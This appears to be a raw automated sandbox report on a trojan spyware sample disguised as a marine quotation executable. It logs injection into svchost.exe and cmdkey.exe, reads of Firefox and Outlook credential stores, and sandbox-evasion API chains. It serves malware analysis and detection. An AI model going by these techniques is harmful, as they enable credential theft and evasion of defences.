              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381F8723_2_0381F872
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03803FA03_2_03803FA0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037DFF403_2_037DFF40
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03811FC63_2_03811FC6
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381FF633_2_0381FF63
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03819ED23_2_03819ED2
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03761EB23_2_03761EB2
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037FFDF43_2_037FFDF4
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03813D223_2_03813D22
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03769DD03_2_03769DD0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0381FD273_2_0381FD27
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03817D4C3_2_03817D4C
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_03763C603_2_03763C60
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037E7CE83_2_037E7CE8
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0377FCE03_2_0377FCE0
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_037F9C983_2_037F9C98
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347EF383_2_0347EF38
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347E3733_2_0347E373
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347E2553_2_0347E255
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347E7143_2_0347E714
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347D7D83_2_0347D7D8
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 3_2_0347CA883_2_0347CA88
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: String function: 00639CB3 appears 31 times
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: String function: 0064F9F2 appears 40 times
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: String function: 00650A30 appears 46 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975050 appears 58 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AE692 appears 86 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987BE4 appears 101 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B910 appears 275 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BEF10 appears 105 times
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 03795050 appears 58 times
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 037CE692 appears 86 times
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 0374B910 appears 280 times
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 037A7BE4 appears 111 times
              Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 037DEF10 appears 105 times
              Source: QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11151732292.0000000003B53000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION#070125-ELITE MARINE .exe
              Source: QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11153728744.0000000003EFD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION#070125-ELITE MARINE .exe
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@18/12
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A37B5 GetLastError,FormatMessageW,0_2_006A37B5
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006910BF AdjustTokenPrivileges,CloseHandle,0_2_006910BF
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_006916C3
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_006A51CD
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006BA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_006BA67C
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A648E CoInitialize,CoCreateInstance,CoUninitialize,0_2_006A648E
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_006342A2
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeFile created: C:\Users\user\AppData\Local\Temp\scrollJump to behavior
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: cmdkey.exe, 00000003.00000003.11918930615.0000000008080000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15249022133.000000000808A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
              Source: cmdkey.exe, 00000003.00000003.11916406824.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11911162884.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11916406824.00000000031D4000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: cmdkey.exe, 00000003.00000002.15244350653.0000000003255000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11922384899.00000000080E6000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.3.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
              Source: QUOTATION#070125-ELITE MARINE .exeReversingLabs: Detection: 60%
              Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe"
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe"
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
              Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe"Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: QUOTATION#070125-ELITE MARINE .exeStatic file information: File size 1749504 > 1048576
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: cmdkey.pdbGCTL source: svchost.exe, 00000001.00000003.11702724830.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11734330614.0000000003200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11152091635.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11151732292.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11648789785.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11646044895.0000000003500000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15246648295.000000000384D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11733827034.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11737430340.0000000003572000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15246648295.0000000003720000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11152091635.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11151732292.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11648789785.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11646044895.0000000003500000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000003.00000002.15246648295.000000000384D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11733827034.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11737430340.0000000003572000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15246648295.0000000003720000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: cmdkey.pdb source: svchost.exe, 00000001.00000003.11702724830.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11734330614.0000000003200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: svchost.pdb source: RAVCpl64.exe, 00000002.00000002.16214552888.00000000066DC000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.000000000316D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000003D4C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.000000000291C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: svchost.pdbUGP source: RAVCpl64.exe, 00000002.00000002.16214552888.00000000066DC000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.000000000316D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000003D4C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.000000000291C000.00000004.80000000.00040000.00000000.sdmp
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006342DE
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00650A76 push ecx; ret 0_2_00650A89
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040505A push cs; iretd 1_2_00405061
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040189C push ss; iretd 1_2_004018A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004180AB push esp; ret 1_2_004180AC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040514D push ds; iretd 1_2_00405171
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411A63 push ebp; retf 1_2_00411A6D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00407270 push 0000006Ch; iretd 1_2_0040727B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418274 push esp; retf 1_2_00418281
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403340 push eax; ret 1_2_00403342
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004174CC push esp; retf 1_2_004174D6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004045D4 push esp; iretd 1_2_004045DD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413663 push cs; ret 1_2_00413695
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417630 push edi; ret 1_2_0041763A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D6A4 push ds; ret 1_2_0040D6B6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00404F63 push esi; iretd 1_2_00404F66
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039021AD pushad ; retf 0004h1_2_0390223F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039308CD push ecx; mov dword ptr [esp], ecx1_2_039308D6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039097A1 push es; iretd 1_2_039097A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C852B4 push edi; ret 1_2_03C852B7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C9124E push ebp; ret 1_2_03C91250
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C95042 push eax; ret 1_2_03C95044
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8753D push edx; iretd 1_2_03C8753E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C854A5 push esp; iretd 1_2_03C854C2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86404 push ecx; ret 1_2_03C86405
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C85B8D push FFFFFFC9h; iretd 1_2_03C85B96
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C84BA2 push esp; iretd 1_2_03C84BA3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8C9AE push eax; retf 1_2_03C8C9B9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C848F7 pushad ; iretd 1_2_03C84902
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C84F53 push ss; retf 1_2_03C84FCF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8CDEC push esi; retf 1_2_03C8CDF9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C85D9C push ecx; iretd 1_2_03C85D9D
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0064F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0064F98E
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_006C1C41
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Found API chain indicative of sandbox detection
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97010
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeAPI/Special instruction interceptor: Address: 106CD44
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFCB3EED144
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFCB3EF0594
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFCB3EEFF74
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFCB3EED6C4
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFCB3EED864
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFCB3EED004
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED144
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EF0594
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED764
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED324
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED364
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED004
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EEFF74
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED6C4
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED864
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED604
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397088E rdtsc 1_2_0397088E
              Source: C:\Windows\SysWOW64\cmdkey.exeWindow / User API: threadDelayed 9166Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeAPI coverage: 3.5 %
              Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.9 %
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI coverage: 1.1 %
              Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1416Thread sleep count: 121 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1416Thread sleep time: -242000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1416Thread sleep count: 9166 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1416Thread sleep time: -18332000s >= -30000sJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\cmdkey.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\cmdkey.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0066C2A2 FindFirstFileExW,0_2_0066C2A2
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A68EE FindFirstFileW,FindClose,0_2_006A68EE
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_006A698F
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0069D076
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0069D3A9
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006A9642
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006A979D
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_006A9B2B
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0069DBBE
